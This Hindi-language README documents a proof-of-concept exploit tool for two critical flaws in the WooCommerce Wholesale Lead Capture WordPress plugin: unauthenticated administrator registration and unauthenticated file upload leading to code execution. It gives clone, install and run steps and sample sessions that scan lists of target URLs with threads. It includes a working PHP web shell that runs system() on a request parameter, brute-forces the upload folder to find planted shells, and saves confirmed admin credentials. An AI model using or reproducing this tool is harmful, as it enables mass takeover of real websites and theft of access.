
अप्रमाणित विशेषाधिकार | अप्रमाणित मनमाना फ़ाइल अपलोड
| फ़ील्ड | विवरण |
|---|---|
| CVE ID | CVE-2026-27542 |
| गंभीरता | CRITICAL — CVSS v3.1 स्कोर: 9.8 |
| वेक्टर | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| प्रभावित घटक | WordPress के लिए WooCommerce Wholesale Lead Capture (WWLC) प्लगिन |
| भेद्यता प्रकार | अनधिकृत विशेषाधिकार वृद्धि |
| प्रमाणीकरण आवश्यक | कोई नहीं |
| CWE | CWE-269: अनुचित विशेषाधिकार प्रबंधन |
विवरण:
WordPress के लिए WooCommerce Wholesale Lead Capture प्लगिन सभी ज्ञात प्रभावित संस्करणों में अनधिकृत विशेषाधिकार वृद्धि के प्रति संवेदनशील है। यह भेद्यता wwlc_create_user AJAX एक्शन हैंडलर के भीतर मौजूद है, जो उपयोगकर्ता द्वारा आपूर्ति किए गए भूमिका (role) फ़ील्ड्स को पर्याप्त रूप से सैनिटाइज़ या मान्य किए बिना उपयोगकर्ता पंजीकरण अनुरोधों को संसाधित करता है। एक दूरस्थ, अनधिकृत हमलावर एक विशेष रूप से निर्मित POST अनुरोध तैयार कर सकता है जो खाता निर्माण के समय मनमाने WordPress क्षमता फ़ील्ड्स — जिनमें wp_capabilities[administrator] शामिल है — को सीधे उपयोगकर्ता मेटाडेटा में इंजेक्ट करता है। यह हमलावर को बिना किसी पूर्व प्रमाणीकरण या वैध उपयोगकर्ता की अंतःक्रिया के स्वयं को WordPress व्यवस्थापक के रूप में पंजीकृत करने की अनुमति देता है, जिसके परिणामस्वरूप प्रभावित WordPress इंस्टॉलेशन से पूर्ण समझौता हो जाता है।
| फ़ील्ड | विवरण |
|---|---|
| CVE ID | CVE-2026-27540 |
| गंभीरता | CRITICAL — CVSS v3.1 स्कोर: 9.8 |
| वेक्टर | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| प्रभावित घटक | WordPress के लिए WooCommerce Wholesale Lead Capture (WWLC) प्लगिन |
| भेद्यता प्रकार | अनधिकृत मनमाना फ़ाइल अपलोड (जिससे रिमोट कोड निष्पादन होता है) |
| प्रमाणीकरण आवश्यक | कोई नहीं |
| CWE | CWE-434: खतरनाक प्रकार की फ़ाइल का अप्रतिबंधित अपलोड |
विवरण:
WordPress के लिए WooCommerce Wholesale Lead Capture प्लगिन सभी ज्ञात प्रभावित संस्करणों में अनधिकृत मनमाना फ़ाइल अपलोड के प्रति संवेदनशील है। यह भेद्यता wwlc_file_upload_handler AJAX एक्शन में निहित है, जो बिना किसी प्रमाणीकरण या nonce सत्यापन आवश्यकता के पंजीकृत है। /wp-admin/admin-ajax.php पर एक निर्मित multipart POST अनुरोध प्रस्तुत करके, एक दूरस्थ अनधिकृत हमलावर किसी भी प्रकार की फ़ाइलें — जिनमें PHP वेब शेल भी शामिल हैं — एक गतिशील रूप से उत्पन्न wwlc-temp-* उपनिर्देशिका के अंतर्गत सर्वर की wp-content/uploads/ निर्देशिका में अपलोड कर सकता है। सफल शोषण से वेब प्रक्रिया उपयोगकर्ता खाते के रूप में कार्य करने वाले अंतर्निहित वेब सर्वर पर रिमोट कोड निष्पादन (RCE) होता है।
यह ऊपर वर्णित दो गंभीर भेद्यताओं के लिए एक Proof-of-Concept (PoC) शोषण स्क्रिप्ट है, जो WooCommerce Wholesale Lead Capture प्लगिन चलाने वाले WordPress इंस्टॉलेशनों को लक्षित करती है। यह टूल दो स्वतंत्र हमले मोड का समर्थन करता है:
| मोड | हमले का प्रकार | लक्ष्य |
|---|---|---|
| मोड 1 | अनधिकृत मनमाना फ़ाइल अपलोड + ब्रूट-फोर्स फ़ोल्डर खोज | PHP वेब शेल अपलोड करें और बहु-स्तरीय फ़ोल्डर अनुमान के माध्यम से उसका पता लगाएँ |
| मोड 2 | पंजीकरण के माध्यम से अनधिकृत विशेषाधिकार वृद्धि | स्वयं को WordPress व्यवस्थापक के रूप में पंजीकृत करें और व्यवस्थापक पहुँच सत्यापित करें |
pip install requests urllib3 colorama
या requirements फ़ाइल के माध्यम से स्थापित करें:
pip install -r requirements.txt
requirements.txt:
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6
# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-27542-CVE-2026-27540.git
cd CVE-2026-27542-CVE-2026-27540
# Install dependencies
pip install -r requirements.txt
# Run the tool
python3 CVE-2026-27542_CVE-2026-27540.py
python3 CVE-2026-27542_CVE-2026-27540.py
यह टूल एक इंटरैक्टिव टर्मिनल इंटरफ़ेस प्रस्तुत करता है। आपसे सभी आवश्यक पैरामीटर पूछे जाएँगे।
एक सादा टेक्स्ट फ़ाइल (जैसे, list.txt) बनाएँ, जिसमें प्रति पंक्ति एक लक्ष्य URL हो:
https://target1.com
https://target2.com
http://target3.com/wordpress
Select mode [1=Upload+Folder, 2=Registration+Admin]: 1
Targets list file (one URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Shell file path [shell.php]: shell.php
Shell signature (marker inside shell) [Nx_SHELL_SIGNATURE]: Nx_SHELL_SIGNATURE
Max pattern-based folder guesses per site [50000]: 50000
Max time-based folder guesses per site [50000]: 50000
Max random-hex folder guesses per site [100000]: 100000
Upload results file [scan_results/wwlc_uploads.txt]: scan_results/wwlc_uploads.txt
Found shells file [scan_results/wwlc_shells_found.txt]: scan_results/wwlc_shells_found.txt
शेल फ़ाइल उदाहरण (shell.php):
<?php
// Nx_SHELL_SIGNATURE
if(isset($_GET['cmd'])){ system($_GET['cmd']); }
?>
नोट:
wwlc-temp-*फ़ोल्डर प्लगिन द्वारा PHP केuniqid('wwlc-temp-')का उपयोग करके गतिशील रूप से उत्पन्न किया जाता है। इसे खोजने के लिए टूल बहु-स्तरीय ब्रूट-फोर्स रणनीति का उपयोग करता है:
परत रणनीति विवरण 0 डायरेक्टरी लिस्टिंग खुली होने पर अपलोड निर्देशिका को सूचीबद्ध करने का प्रयास करता है 1 पैटर्न-आधारित समय-व्युत्पन्न और अनुक्रमिक संख्यात्मक अनुमान 2 समय-आधारित हेक्स देखे गए HTTP अनुरोध टाइमस्टैम्प पर आधारित 3 रैंडम हेक्स शुद्ध रैंडम हेक्स स्ट्रिंग अनुमान
Select mode [1=Upload+Folder, 2=Registration+Admin]: 2
Targets list file (one URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Base registration username (prefix) [Nx_admin]: Nx_admin
Base registration email [[email protected]]: [email protected]
Registration results file [scan_results/wwlc_register_results.txt]:
Admin hits file [scan_results/Admin_login.txt]:
यह टूल:
administrator भूमिका इंजेक्ट करते हुए एक निर्मित पंजीकरण पेलोड प्रस्तुत करता है| फ़ाइल | विवरण |
|---|---|
scan_results/wwlc_uploads.txt | वे सभी साइटें जहाँ फ़ाइल अपलोड सफल रहा (मोड 1) |
scan_results/wwlc_shells_found.txt | पूर्ण शेल URL जिन्हें एक्सेस योग्य पुष्टि की गई (मोड 1) |
scan_results/wwlc_register_results.txt | क्रेडेंशियल्स के साथ सभी पंजीकरण प्रयास परिणाम (मोड 2) |
scan_results/Admin_login.txt | क्रेडेंशियल्स के साथ पुष्टि किए गए व्यवस्थापक लॉगिन हिट्स (मोड 2) |